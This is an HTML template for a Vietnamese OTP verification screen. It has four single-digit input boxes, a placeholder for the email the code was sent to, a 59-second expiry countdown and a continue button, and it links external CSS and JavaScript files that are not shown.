<link rel="stylesheet" href="/css/otp.css">

<div class="page center">
  <div class="form" method="POST">
    <svg width="24" height="24" fill="none" class="k3u69u-3 dWVAYK" style="position: absolute; left: 16px; top: 16px;"><path d="M15 6l-6 6 6 6" stroke="#2A2D34" stroke-width="2" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round"></path></svg>
    
    <span style="display: block;margin-top: 25px;">Nhập 4 chữ số được gửi đến:</span>
    <span class="sp-phone">
      {{email}}
    </span>
    
    <div class="otp-box">
      <input maxlength="1" style="margin-left: 25px" name="otps" pattern="[0-9]*" class="otps cBKpfg" value="">
      <input maxlength="1" name="otps" pattern="[0-9]*" class="otps cBKpfg" value="">
      <input maxlength="1" name="otps" pattern="[0-9]*" class="otps cBKpfg" value="">
      <input maxlength="1" style="margin-right: 25px" name="otps" pattern="[0-9]*" class="otps cBKpfg" value=""></div>
    
    <span class="otp-alert">
    
  </span>
    
    <span style="display: block;margin-top: 35px;">Không nhận được OTP??</span>
    
    <div class="otp-expiry">
      00:<span class="second">59</span>
    </div>
    
    <div class="form-option">
      <button id="btn-confirm-otp">Tiếp tục</button>
    </div>
  </div>
  
  
</div>

<script src="/js/otp.js"></script>